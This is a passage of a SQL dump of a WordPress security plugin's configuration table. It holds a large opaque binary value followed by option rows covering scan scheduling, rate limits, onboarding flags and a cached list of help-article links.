i]AI���N���{���G�)�-N��s%��$H�Va%c�%���d�K2��d2�E2��d���{��dn9T���wo�@�YJ��=8�J�jBH0\'%��* �5VB:�EB\Z_���%�c�J�r뎄:�!���HHXׯJ���JD�?$b�i��ݨD2a+�7�J�$��p�źC��]֒�Cw%����U�M�U���U�T5�@�f\'U�}�j@�H�J�.�H�YK��^�ͷ~I���I�`̥ۦ RN�tOv�\"Uz��/5�&w��&��RӧR�ن�R����վ���w��X���Bz:/u��&u\"�J��K��Б��K��W�\'��^��ϸ���/��G��#��u����U�Ҡэ�sQ!��}��!�I/UKÃ�H#���W}�W���k����u��p�F_9*�騔�LђƉf��7B� M҄n�-/�&u�m�`�m�.���$��Ҕ�\\iʋjijb�4mRW��%M��-ͼ�NzǧWz7��I�4��Yz�Vi^}�4�{��薕�xs�����_ZڰNZއ�V�H+wOK+[J�,ӥU�)Ҫ7����ZҚ��҇�\r�:�Fi�O����Y��x��11G��%}�J�u+����H�\'�H��I��K_�aK�W�H�?����r���^���,���dH[x��G��$Ki�k�V�:iG�giǭ`i\'�W��p_�}�R��M��7�@��B���]��?�GoHjZ���ҡG:ҡA�t�p�tD0-���~��.�V,��,C�����tP�k���ۼ�W���]�`=%]�H���J1Rȵ�R`I\n@H��P)�E��E���jt�X�)6e�w�,�_����I �\")��;)�3XJM;\"�V��R�:���o�!_��\0H��R�F��Ӓ��\"�oR� ]*�Ke7\r�ʄ5ҥG�KP����)�Z�l�Cٚ\r��u�e�\"�d����æe��2��/�\r�d��2�e��v2��2�@�l����;2}�q�>r����o�T!3L��&_�N6�1�e�o��+ 2�u�2#���<Vv�n�̴�+3;�!3�3\'�H0�Y����z]vh���J��0AOf_�/�_ˎ�\'e�2�W)2�[Q2�ޏ2W�n����[9W��-���T7���/�y� ;ů�����|ZO�|���3����52�ɲ@�bY�|��\\X�����͏d�S�e��h�+�Q�+HGYk��*��\"Rvm�^ٵ�����e����Ȧ<Y䈁,:��,:��,�(�%��ݚ|,�\r~&Kl˒ԣd)�e�������;�,��\r��,�Yֻ]������!Y.2L�W��#�e<dųBY��HV��IV:�%+��)��\\(��{KV��$��,��\\�j�Kd���=l���n��re��N��Ų�?����rY��;�g��d�z2d/=�^5��^�e���eo�Y�6k����FY��eY;�)�d��z�7�z�1����eU�\0\"L6��I6�&��}�֔}[̓MUȦiWd��u�YX�l�Ô���E��k���n���D���雲?�ò�b�_\r������� �ɐ��d��{e(?C��M��W�p7;d����NF�+#>���U/����d�p͢FFÒdt�z�8C�Z�#c��+c1��8;d@���Q(pjd���e\"k[��U�L��Q&�J��/�ʔ\re�jt��mٿ|3ٿ�;r�A�|�G��`�|���|MN�|�\\�n����u����w�ɵ�dr��A����\\\\���|��q�4L�c�|�`�|��\\�wPMn�#��,߿n��\0���<Vn�G[n�=Wn��/7���<�+7�~Gn֝-?�l\"�\\;+���,�2�[\'��o������?�#?�~[~�6M�P�\\�@���l�Q����?˝N4ȝ�F��^�O�j�OH��=7��=�\n�&f�>�<�χP��r��&r_�g�Y�X\\ȗ���+�TxF� C����_�)���I�Gj��on��<a ��ԓ�T��qE�����:�<�g���A���J�$��\'���S~?��@�����S���ۣ�yIpy�K�<o�D^��,/��G�K���K+��ҡ!y��:�O�ȳY�8��I��k��!�Y�ZP�y_��U��m\nY��X ױ oe�����m.��v׃��fy���C)����;+;����n����Y�A�Z�a�I��}�|���|��S>*!�Ǣ��c?��/��ɿ��Ol��O�˿�ȧR�g�G�g�nȿ�u������ݑ�AS��b��� \\�ה*^� ��Tɡemr褳��$��J��1r�~��p^�zC��_��cw1�X��w�Д��l���R&\'ѳ��\0;9u&g�N�3�l��<�9Z29/맜�a��7œ���\"��HT,����� ��5\'���K���w���˗����D�J��|�v�B��C�20�X�Y�6�U�o>�P?��X�q�B�8D�a��b�D�ic�bK-X���K��}H�-�b\"I�36S��0M�{U��,]�絧��}D�/o�bߧ����\n����N������K��H���{Ta��Ha�Q��=ܧ�=械ߴ�p�R�p�)���pR��p�5Vx�7+<�9��C^>�\n/?m��p�¯�C�ﭦ�*�^sT�y�@<S�nU};��g)r�).�G*B+S�bEx���2�Vq�cJqe(Xq���\"�n��Fq�\"v�@����7lR���Yq�r��v��\"�q@�t�\"��\"EU�H�>Td\0���)��R��~T�̄*r34��ˊ���k����]Q�IWQn��(�)��*�G����^C�J�\"Eef���u��ꨨn������x���^K�챢�l�⥎��U�M�k3�����-$�����{o[E[t��3?N���蚹��ި��p�W�#�S��*>��+���(jl�����)��bt��bl����}�dزb���y���ի��wV��=����\0��T\0\Z�\n��\Zb�@�R O)PK�x��\n�6a�\n\"篂**�)k|���~��Fg*����]�k�V�\n�B�;�PޥP��R(f��3j���\0Ŋ�7�J#M�RP�\\u%^�j��T��+�w�+�]t��^���D��a�\\czN��3N��S���S��أ\\�5�Ԣ?U��W�5+u�Օ����=+7��Qnn�Pn�LVn�JW��v\\��ոr�TO��v����_��OJC�r��K�>-�r���rߵ*�����8���� \r�<ȉV���T��Q���T��S*;��tRZ�VZ����(mΚ+�N*�c�v�E�}U��(#N�l-P:Sݕ.�T����k�/���\r���\\選��rئ�B�P�l\\�<�$V�~}Ry��M�\'��<+��pWԅ*���`�z�9�t��ʋ\r�ʰ����AG�W[_(#��+�\no)�K�)of�S��(o�T*�\r��o�)K��+���5��t�)��y�2��2�1[��mV�emR�w�*ߤ(�����Z�)KW�(K�}ʚ�\'�5,o��ov�ڕ|e퇲NT>�ݩ|�{M��蠲!�W�H�R>�8�|~�G�\"gV���|�6U����������_����}T����O�nЭl��Wv�R�݉iʾȫʏeB�r���?��T�UYQ�\Z�#���#�p�-_�%��r\"���k��r2���D~UN�Ӕ�lu��W�k�)��)3��s�m���-.J\0����J �����WBn�)a�KJ8���U�ܥP\"[�(��J��q%�앒$\nP�m�*)&�Ԑ%�\\ɜ����u*��h���C)��O��X�r�!bq�\Z��x >��EC�+�r�Ji�4.��8\\CK\"B ����N�II�H���T$\r�%�P�T$Rtҥ�z�������ѠPz��n�ng@�(%虳z��C���Qe軣���@��(�����hP�-/��ˠy���g��Z��`�|W����A;��=]Л�z�,�~�_R\r��`�F�]�Q}r�p`<�=�۹`�c$L�5�i%\'a��50c�\'�N��yf`��1Xt����:eX��\0���]����y��m�-=v���`�k���0�e,P+G�����,}4\n����n�u\\���*�e�n1�_<��﯁��R�^�`����t�Y�|����d�;i�C�}��g�F}?�=6���&���q:l�U��D�6u��Nm�9��>����q�aot*x�B D\'B�o@H����*84J�L����p�D�g?9eD;�A�_eS}b�,�ؽ��\rq�VB��E�wU���8b$N2�$�H�Rgg���P#87k=��}.��Az�\\H_<2�l�Kw��2o��~\\��\nWՕ���pͰnV�@��T�;�����p�3�7�Id���c.�=}��\n��BQX)<�M�G\njP|�<<q_�����=�y���TCx�\'\Z�;~��I�b�p�\\�\0UGW��_�+\'x}��F�@�Q&����4j�B��h��_��@���p����2�M2|w���:[�O�w�s��|z�3��*`�v���֚aOY�J�\n�tB\r{�.�>Nި|�\ZU~t�/;��8`�\'���/�A���q!v�����Q{P#�7��W����hp���Ge����q��8Ƭ��tG�KG��J>�kU� /\"pb�\Z/Vt�)���$�M��I�6N���iW4p�h\r��Q4�[����,`�Q��9C��Wh~�Z\\�-���)Z^|��izh�2���F�2�*�C;�l�/:���p�K9.�\r��U�!��i�=tz:W�MD�wQ�\Z�=\\��G���8=ߏC�/�Kw5z�rB��V\\�7�L\n�5���?{�g��M�Cߜz�߃~���I�1@�?nL��@�+�9�n�x�[�bq�_w���p�5{��o�{����m^���4�4��_p?��3���x0�\Zr���6����%x8���ã�Nv���q�0�[������w�\n�}��#�y�&<��$�C����ɚ�0��?�`��=1c�[��/5�eW+̲�YS�zK=f�`Nb��o읆7�{���oM���?ǻ5���e��{���e%j,�B�Xd\\�����\n|��ş��I?G,�\\�eϻ㳄h|�� ��\r�\n�`��5+k�cո]�ҿ_V��X]�\rk<W`��I���o�b]��5��?N��3���������n`Ky~Vٌ��\r���FI�~d�w~H������3\0�t$�{ȓ�I�4�?��n.��}�r�\\E=�3Ii�g�5˔z��B}�:H9/�T��P��i@�Ѥ�M�Ҡq�i�r�\\[B�����5�\"i]J!��H{Y霉�a]7а�wIo� �=n&��d��L�!/Ȱv>�\r�L����%�4�0M*J�)�\'iʢd�^J&�$���hځ{4�|+M7/����d���溚���dn�L�H\r&d9͐��m�E�}S9�,%��6�G���B��B��E���F9�ϥ�%\Z�ts-M;L˜��yw�ts�U����\\Z�@Վ�eyŇ��eZg�N>�䛹�|�O%?�0�����5���;�6X��Pږ@���}ӂh��ڇ(��?��K�|������Xc:��M��\'P��5�����2:��H�3/PTk�\\ tj�d��+��7�(n�1JP$JPk��E����l�(���Bg����>��J-��Ԇ:?���b�)�Q�5�S�1o�{A]�J���<(kv\"]u�@�^�� �6L�v~���B9���F�Gʝ|�r���[]����2���74P���T��Dz��Å:���*���J�]���OR�g_*\r2��s*�\ZHe��P��-���F��s���=U;���2�u�I�Gһ���L ���?fPÔ�(-����o�Rs�~����h�Km��Kj_��ګ��Ou�U����s@�\\ً�ʆ��p���];-X!��rSYq��?��Φr�=V�g��U��.���yɪ]G��SVmV�uXm~\'�e��A}����<�љ���АJ�Yp�u�M`��<�ڄ�eO`����`�56���#V��a�<�x ����#\r�����<�[��l��̖�x�<a�:O��\'�ڰ��d�<Ý\'���)�3٤L���^�3�&�i~ώW`��M<��[&�b+�,��p���{���^0��ZG��;5��t/_W�˃?�\r�RmŮ�&�_�ͫ��N]e��yu�-�qِ=��c����&Bx�e(�����ղ��&{\'�?��bʾ���O�oP��f.�@-\\~����9�]�wm��ݣ����Q����q�8~��C��8tq9�ީ��O{pؚt˨�6|�s&�ٕ�g#G�_��8ҹ�#�� c\r>�Q��S?sL�O>�x�O�[ñ�9V��Oo�����+�p�ݕ���I����N����My����(�s���y��|q���h��}�����Ô�8��&_��f��k-����|{�N��ѓ��w}��|�|�..(�̅;�\"�ü(~ؖΏۺ���\"��pu.7I��E\\�Ѝ+^�s��a~i;�����n���#f��g\\�Ńk5�s��N~S�;��n��;��m������>r��Hn�|�C�p��}�4@�?���ֿ����%�Mώ�Y~����^�g3�b�گQ�P���6]Q>Q\'�]���jQ�}!�eWd���5!Q�䄋v��h�g��}O\Z8Wt\"~�XO�)�ݎ2줱��*��4���$�?�C�_���Ā��(�E����H�<8(c*Aƙd�Dj�IˣdJ��Lm6��ފ�5��V�Q�buJSlU��6Ķ���־�w�]�T���)�[�dA�HYx�U��8�*�%�ʲԌeiL�8���ӫ4Y5t���T#�;�WI������ɺ��) _+KY?{���W��4L��ٺ3M�(J��z�i�(;�%��X�\'�J�z�LҒ��v�И>rx���\rk��x+���.�W���Z9�D5����?�T�P��X- +NH�XV()k^KJ`����\'�c�%uF��S��i#$ӭH��I��sɪ�\"Y�%r���6\'A�\"$\'*Rr�%ש@�ɝ�R�?T$���R01J\n\'ΓBUy�V*u\n�q��<��E�wIqM���HI�gy:�J��<$�cʤ��@��I�~y���Tx{HŶ�RY U�w�e[����BjޚKM�Z�=~B���;���N�E�Mȓ�9(\r�{K�ۏ�О%�.��i��|2� -�����f�R�+��H�_i�>G�f͓�g�k{�|���ʷ�Q�1�]:��HG�\"�n��K��\ZS�� M�Ч$a���ͩ�fl�?�wZjȑ\0','no'),
('manualScanType','onceDaily','yes'),
('max404Crawlers','DISABLED','yes'),
('max404Crawlers_action','throttle','yes'),
('max404Humans','DISABLED','yes'),
('max404Humans_action','throttle','yes'),
('maxExecutionTime','0','yes'),
('maxGlobalRequests','DISABLED','yes'),
('maxGlobalRequests_action','throttle','yes'),
('maxMem','256','yes'),
('maxRequestsCrawlers','DISABLED','yes'),
('maxRequestsCrawlers_action','throttle','yes'),
('maxRequestsHumans','DISABLED','yes'),
('maxRequestsHumans_action','throttle','yes'),
('migration636_email_summary_excluded_directories','1','no'),
('needsNewTour_blocking','1','yes'),
('needsNewTour_dashboard','0','yes'),
('needsNewTour_firewall','0','yes'),
('needsNewTour_livetraffic','0','yes'),
('needsNewTour_loginsecurity','1','yes'),
('needsNewTour_scan','0','yes'),
('needsUpgradeTour_blocking','0','yes'),
('needsUpgradeTour_dashboard','0','yes'),
('needsUpgradeTour_firewall','0','yes'),
('needsUpgradeTour_livetraffic','0','yes'),
('needsUpgradeTour_loginsecurity','0','yes'),
('needsUpgradeTour_scan','0','yes'),
('neverBlockBG','neverBlockVerified','yes'),
('noc1ScanSchedule','a:3:{i:0;i:1723521000;i:1;i:1723780200;i:2;i:1724039400;}','yes'),
('notification_blogHighlights','1','yes'),
('notification_productUpdates','1','yes'),
('notification_promotions','1','yes'),
('notification_scanStatus','1','yes'),
('notification_securityAlerts','1','yes'),
('notification_updatesNeeded','1','yes'),
('onboardingAttempt1','skipped','yes'),
('onboardingAttempt2','','no'),
('onboardingAttempt3','license','yes'),
('onboardingAttempt3Initial','1','yes'),
('onboardingDelayedAt','0','yes'),
('originalScheduledScanStart','1723521000','yes'),
('other_blockBadPOST','0','yes'),
('other_bypassLitespeedNoabort','0','yes'),
('other_hideWPVersion','0','yes'),
('other_pwStrengthOnUpdate','1','yes'),
('other_scanComments','1','yes'),
('other_scanOutside','1','yes'),
('other_WFNet','1','yes'),
('premiumNextRenew','1747513685','yes'),
('previousWflogsFileList','[\"rules.php\",\"config-livewaf.php\",\"config-transient.php\",\"template.php\",\".htaccess\",\"GeoLite2-Country.mmdb\",\"ips.php\",\"config-synced.php\",\"config.php\",\"attack-data.php\"]','yes'),
('satisfactionPromptDismissed','0','yes'),
('satisfactionPromptInstallDate','0','yes'),
('satisfactionPromptOverride','1','yes'),
('scanAjaxTestSuccessful','1','yes'),
('scanFileProcessing','','yes'),
('scanMonitorLastAttempt','1723521237','yes'),
('scanMonitorLastAttemptMode','highsensitivity','yes'),
('scanMonitorLastAttemptWasFork','1','yes'),
('scanMonitorLastSuccess','1723521239','yes'),
('scanMonitorRemainingResumeAttempts','0','yes'),
('scansEnabled_checkGSB','1','yes'),
('scansEnabled_checkHowGetIPs','1','yes'),
('scansEnabled_checkReadableConfig','1','yes'),
('scansEnabled_comments','1','yes'),
('scansEnabled_core','1','yes'),
('scansEnabled_coreUnknown','1','yes'),
('scansEnabled_diskSpace','1','yes'),
('scansEnabled_fileContents','1','yes'),
('scansEnabled_fileContentsGSB','1','yes'),
('scansEnabled_geoipSupport','1','yes'),
('scansEnabled_highSense','0','yes'),
('scansEnabled_malware','1','yes'),
('scansEnabled_oldVersions','1','yes'),
('scansEnabled_options','1','yes'),
('scansEnabled_passwds','1','yes'),
('scansEnabled_plugins','1','yes'),
('scansEnabled_posts','1','yes'),
('scansEnabled_scanImages','1','yes'),
('scansEnabled_suspectedFiles','1','yes'),
('scansEnabled_suspiciousAdminUsers','1','yes'),
('scansEnabled_suspiciousOptions','1','yes'),
('scansEnabled_themes','1','yes'),
('scansEnabled_wafStatus','1','yes'),
('scansEnabled_wpscan_directoryListingEnabled','1','yes'),
('scansEnabled_wpscan_fullPathDisclosure','1','yes'),
('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:4:\"spam\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:4;s:8:\"finished\";i:4;s:8:\"expected\";i:4;}s:6:\"public\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:3;s:8:\"finished\";i:3;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}}','no'),
('scanTime','1723521239.625','yes'),
('scanType','highsensitivity','yes'),
('scan_exclude','','yes'),
('scan_force_ipv4_start','0','yes'),
('scan_include_extra','','yes'),
('scan_maxDuration','','yes'),
('scan_maxIssues','1000','yes'),
('scan_max_resume_attempts','2','yes'),
('schedMode','auto','yes'),
('schedStartHour','21','yes'),
('scheduledScansEnabled','1','yes'),
('serverDNS','1723467609;4312;62.60.211.153','yes'),
('showAdminBarMenu','1','yes'),
('showWfCentralUI','1','yes'),
('signatureUpdateTime','1723398247','yes'),
('spamvertizeCheck','1','yes'),
('ssl_verify','0','yes'),
('startScansRemotely','0','yes'),
('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Free\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-free\\/\",\"excerpt\":\"Wordfence Free is an all-in-one security solution for WordPress websites that includes an endpoint firewall, security scanner, login security, alerts, centralized management, and more.\",\"order\":0},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-premium\\/\",\"excerpt\":\"Wordfence Premium comes with real-time firewall protection, real-time scan signatures, an IP address blocklist, country blocking, and Premium support.\",\"order\":1},{\"title\":\"Wordfence Care\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-care\\/\",\"excerpt\":\"Wordfence Care is for business owners who place a premium on their time. Our team installs, configures, optimizes, and maintains your WordPress site security.\",\"order\":2},{\"title\":\"Wordfence Response\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-response\\/\",\"excerpt\":\"Wordfence Response is for mission-critical WordPress websites that require 24\\/7\\/365 security monitoring with a 1-hour response time and 24-hour remediation.\",\"order\":3},{\"title\":\"Incident Response Services\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/incident-response-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":4},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/api-key\\/\",\"excerpt\":\"All Wordfence installations need a license key, also known as an API-key. The key can be a free key or a Premium key. \",\"order\":5},{\"title\":\"Account and Billing History\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/account\\/\",\"excerpt\":\"How to navigate and use your Wordfence account.\",\"order\":6},{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":4},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":5},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":6},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":7}],\"order\":7},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":8},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":1},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":9},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the firewall rules that protect against various attacks, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":10},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, and shells that hackers have installed. It also scans for known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":11},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Live Traffic analysis, WHOIS Lookup, Import\\/Export Options, and Diagnostics.\",\"children\":[{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":0},{\"title\":\"WHOIS Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":1},{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5}],\"order\":12},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":13},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you will find the answers in this section.\",\"children\":[{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":0},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":1},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":2},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":3},{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":4},{\"title\":\"Compatibility\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/compatibility\\/\",\"order\":5},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":7},{\"title\":\"Plugin \\/ Theme Conflicts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/\",\"order\":8}],\"order\":14},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available standard contractual clauses to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":15},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":16},{\"title\":\"Wordfence Intelligence\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/\",\"excerpt\":\"Wordfence Intelligence is an industry-leading WordPress vulnerability database and evolving Threat Intelligence platform that contains over 12,000 records for vulnerabilities in WordPress plugins, themes, and core.\",\"children\":[{\"title\":\"V2: Accessing and Consuming the Vulnerability Data Feed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/v2-accessing-and-consuming-the-vulnerability-data-feed\\/\",\"order\":0},{\"title\":\"V1: Accessing and Consuming the Vulnerability Data 